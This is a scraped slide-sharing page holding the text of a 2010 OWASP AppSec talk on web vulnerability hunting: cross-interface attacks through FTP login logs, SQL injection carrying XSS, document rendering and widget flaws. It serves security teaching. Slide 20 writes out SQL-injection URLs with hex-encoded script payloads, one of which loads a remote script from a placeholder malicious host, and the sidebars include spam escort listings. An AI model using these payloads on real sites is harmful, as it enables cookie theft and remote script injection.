2009: Securing Applications With Web Application Firewalls and Vulnerability ...2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
WebApps_Lecture_15.ppt
WebApps_Lecture_15.pptWebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
 
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request ForgeryOWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10 -2007
 
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud appsSecurity in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
 
OWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITISOWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITIS
 

Mehr von Aditya K Sood

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareAditya K Sood
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodAditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAditya K Sood
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineAditya K Sood
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...Aditya K Sood
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedAditya K Sood
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Aditya K Sood
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis PaperAditya K Sood
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Aditya K Sood
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareAditya K Sood
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Aditya K Sood
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware TaxonomyAditya K Sood
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...Aditya K Sood
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingAditya K Sood
 

Mehr von Aditya K Sood (20)

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks Malware
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB Instances
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in Elasticsearch
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and Defences
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android Infections
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and Operated
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis Paper
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks Malware
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware Taxonomy
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile Hacking
 

Kürzlich hochgeladen

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 

Kürzlich hochgeladen (20)

08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 

OWASP App Sec US - 2010

  • 1. Bug-Alcoholic 2.0 - Untamed World of Web Vulnerabilities Aditya K Sood SecNiche Security Labs Sr. Security Practitioner, Armorize OWASP adi_ks [at] secniche.org AppSec 2010, University of California Irvine, CA, USA Copyright © The OWASP Foundation September 10, 2010 Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. Disclaimer  All contents of this presentation represent my own beliefs and views and do not, unless explicitly stated otherwise, represent the beliefs of my current, or any of my previous in that effect, employers. Dependency  Web penetration testing plays a critical role in assessing the applied security.  Vulnerabilities in deployed products matter a lot.  Testing output depends on exploitation of existing issues and discovering flaws.  Attack classification remains same but modus operandi of attack varies  Testing requires creation of attack surface. OWASP 2
  • 3. About Me  Founder , SECNICHE Security Labs.  http://www.secniche.org  PhD Candidate at Michigan State University.  Senior Security Practitioner , Armorize  http://www.armorize.com  Worked previously for COSEINC as Senior Security Researcher and Security Consultant for KPMG  Author for HITB E-Zine, Hakin9 ,ELSEVIER, USENIX Journals.  Likes to do Bug Hunting and Malware dissection.  Released Advisories to Forefront Companies.  Active Speaker at Security Conferences including RSA etc.  Blog: http://zeroknock.blogspot.com OWASP 3
  • 4. Notification All the vulnerabilities discussed in this talk are in the process of patching. This discussion is all about understanding the attack methods and using them further in a real time environment. All for learning and education purposes. OWASP 4
  • 5. Agenda Web 2.0 – Walkthrough  Web 2.0 – The real world  Web 2.0 trends ( vulnerability classification, browsers state)  Web 2.0 – Exploitation shift  Web Application Security is not a separate component ! Web Vulnerability Hunting(Exemplary) – Cross Interface Attacks (CIA) / attacking backend login consoles / – SQLXSSI – Fusion { XSS, SQL } / XSS payload in SQL parameters / – Document rendering attacks / exploiting content transformation / – Web widgets interface flaws / testing mini web play ground/ – Persistent redirection attacks /exploiting logout modules/ – Declarative security manipulation / tampering browsers/ – Insecure Content inclusion / exploitation by behavior / Conclusion OWASP 5
  • 6. Web 2.0 – The Present World Components in real world OWASP 6
  • 7. Web Trends – Incidents Classification Top Web incidents/trends of 2009 /predictions for 2010 © stats by Breach OWASP 7
  • 8. Web Trends – Vulnerability Classes Web vulnerability classification - 2009 © website stats by Cenzic OWASP 8
  • 9. Web Trends – Exploited Browsers Web vulnerability classification - 2009 © stats by Cenzic OWASP 9
  • 10. Web 2.0 – Exploitation Shift Why ?  System vulnerabilities are getting harder to exploit  Web 2.0 service platforms  Client side exploitation – easy control through browsers  Origin of Web as a service standard  Increased business dependency on web 2.0  Centralized platform for content sharing from different resources  Online social networking  Wider window of exploitation through web  Information gathering about targets is easy on web OWASP 10
  • 11. Web Application – Security Is Not Separate ! Robust Web Application Development Design Security Privacy Reliability OWASP 11
  • 12. Web Application Vulnerability Hunting Pillars  Design and Development  Attack and Exploitation  Patching and Rebuilding OWASP 12
  • 13. Cross Interface Attacks (CIA)  Hardware devices using admin interfaces.  Admin interfaces : { Web, FTP, Telnet}  Do we require all admin interfaces ?  If web admin is allowed, so what about backend consoles!  Is URL restriction a good practice?  Is it advantageous to have backend consoles?  Does access control serves well?  CIA targets FTP/Telnet admin consoles.  Step by step developing an attack surface. Hardware devices – firewalls, disk stations, management systems etc OWASP 13
  • 14. Cross Interface Attacks (CIA)  Attack base and considerations  Presence of FTP/Telnet admin login console  Hardware appliances have default error logging mechanism  Log interfaces are served in HTML without filtering  A bad design practice from security point of view  Protocol such as FTP/Telnet default nature helps in information gathering  FTP Truth Collective username and password authentication  Followed to avoid enumeration of user accounts  No check on login attempts. No check on characters.  Usually, accessible widely. – Do you think access control is required? OWASP 14
  • 15. Cross Interface Attacks (CIA) Attacking and testing  Gathering information about allowed characters  No aim to get authenticated – FTP 530 Login Incorrect is what we require.  Malicious payloads are used as username and password – Injections / Scripts / Iframes / DOM Calls / Persistent Payloads – Inject what ever you want ! – Good point for triggering CSRF attacks  Of-course , Authentication failure. Error gets logged.  Payloads become persistent. It can be reflective.  Bad design practice – Unencoded / Unfiltered HTML rendering – Inappropriate web logging mechanism  Viola ! Something happens. OWASP 15
  • 16. Cross Interface Attacks (CIA) Scrutinizing default buffer  To determine the number of characters that are allowed  Supplying excess of buffer in FTP_USER_NAME input  FTP_PASS_WORD reflects the allowed FTP_USER_NAME  Injection points – {FTP_USER_NAME , FTP_PASS_WORD} OWASP 16
  • 17. Cross Interface Attacks (CIA) Injecting payloads  Supplying payloads as credentials  Input points – {FTP_USER_NAME , FTP_PASS_WORD} OWASP 17
  • 18. Cross Interface Attacks (CIA) What else?  Anything  Irrespective of user’s environment { OS /Browser etc } OWASP 18
  • 19. SQLXSSI: Fusion {XSS , SQLI} Differential attack surface  How far we can go in using the standard vulnerabilities?  How many different ways of exploitation can be developed?  Why not fusing one vulnerability into another ?  Its’ all about game of payloads Triggering XSS through SQL Injection  All types of XSS possibilities  Verbose SQLI vulnerability is the base  Errors with truncated SQL queries with parameters  XSS payloads injected in SQL parameters  Obfuscating payloads  Basically, an XSS injection using database semantics  Reflective in nature OWASP 19
  • 20. SQLXSSI: Fusion {XSS , SQLI} Generalized pattern  <script>alert(document.cookie)</script> = 0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f736 3726970743e http://vulnerable.com/web_page/index.php? id=1and(select1from(selectcount(*),concat(0x3c7363726970743e616c657274282f7363686170 2f293c2f7363726970743e,floor(rand(0)*2)) x from table-name groupby x)a)  <script src="http://wwww.malicious.org/ex.js" />= 3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732 e6f72672f65782e6a7322202f3e http://vulnerable.com/web_page/index.php?id=1and(select1from(selectcount(*),concat(0x 3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732e6f72672f 65782e6a7322202f3e,floor(rand(0)*2)) x from table-name groupby x)a) OWASP 20
  • 21. SQLXSSI: Fusion {XSS , SQLI} – Example (1) Error gets rendered in browser OWASP 21
  • 22. SQLXSSI: Fusion {XSS , SQLI} – Example (2) Injected XSS Payload in SQL parameter OWASP 22
  • 23. SQLXSSI: Fusion {XSS , SQLI} – Example (3) Injected payload starts downloading malicious XLS file OWASP 23
  • 24. SQLXSSI: Fusion {XSS , SQLI} – Example (4) Image with malicious request is injected OWASP 24
  • 25. SQLXSSI: Fusion {XSS , SQLI} Real world!  Websites are getting more susceptible to these issues  Vulnerability ratio exceeds to 1:2 Thanks to RB (1337) (http://www.schap.org) for initiating this type of attack surface So what !  One vulnerability can lead to another. Testing is inadvertent.  SQLI can be used in a differential manner  Advanced step in conducting XSS through SQLI  Database design matters OWASP 25
  • 26. Document Rendering Attacks Concept  Inability of existing filters used for content transformation  Inappropriate design of web applications  Mistake – using browser as editors for content rendering  Do you want to upload you resume in MSWord? Attack vector  Setting payloads as inline URL links in the Office documents  Document is required to be viewed. Preview properties.  Persistent in nature primarily. User interaction is required.  MSWord, PowerPoint etc all work well depending on the web application Bypassing XSS filters through Office documents http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf OWASP 26
  • 27. Document Rendering Attacks Payload is injected as Hyperlink OWASP 27
  • 28. Document Rendering Attacks The document is edited in the enterprise web application OWASP 28
  • 29. Document Rendering Attacks Exploited OWASP 29
  • 30. Document Rendering Attacks Case Study XML based authoring flaws  Vulnerability reported in SCRIBD platform in 2009  Reported and patched  Scribd failed to implement a filter on payload set in protocol handlers  Links directly injected and converted to XML  Lastly, compiled and displayed in flash player IPaper Platform XML based Link Authoring Flaw – Scribd http://coseinc.com/en/index.php? rt=download&act=publication&file=design_inaccuracy_inside_ipaper_framework.pdf OWASP 30
  • 31. XML Authoring Flaw – Case Study XML working model OWASP 31
  • 32. XML Authoring Flaw – Case Study (Example) OWASP 32
  • 33. Web Widget Interface Flaws What lies beneath? Web widget  A snippet of HTML code embedded in the website. You can "copy" that code and "embed" in your web page  Gadget is proprietary where as widget is freely available  Diverse functionalities – advertisements, traffic analysis , news, feeds , etc Web widget code snippets  JavaScript  Adobe Flash plugins  Code for embedding Windows Media player  Silverlight plugins OWASP 33
  • 34. Web Widget Interface Flaws Insecurities Code specification issues  A widget or gadget can be designed insecurely  HTTP parameters play a crucial role in working  Arbitrary code execution in OS – Scripting interface  Unsanitized, unfiltered, unverified data acceptability Interface with websites and triggering vulnerabilities  Understanding the design of widget  Widget interface with the primary website and how it works  Registered widget and domain names in database can cause security problems in the base website OWASP 34
  • 35. Web Widget Interface Flaws Web widget working layout The model looks simplistic in nature. OWASP 35
  • 36. Web Widget Interface Flaws Case Study Real time issue in one of most recognized vendor – The website is a leading service provider for news and advertisements – The widget is allowed to install on any custom blog or user website after the registration process. The widget code is changed based on the platform such as blogger , MySpace etc – Once the registration is done, the widget snippet is provided to the user or customer for inclusion in his/her website – Now the content provider has a URL which redirects traffic from the primary website to the registered blog.  A very bad design practice. OWASP 36
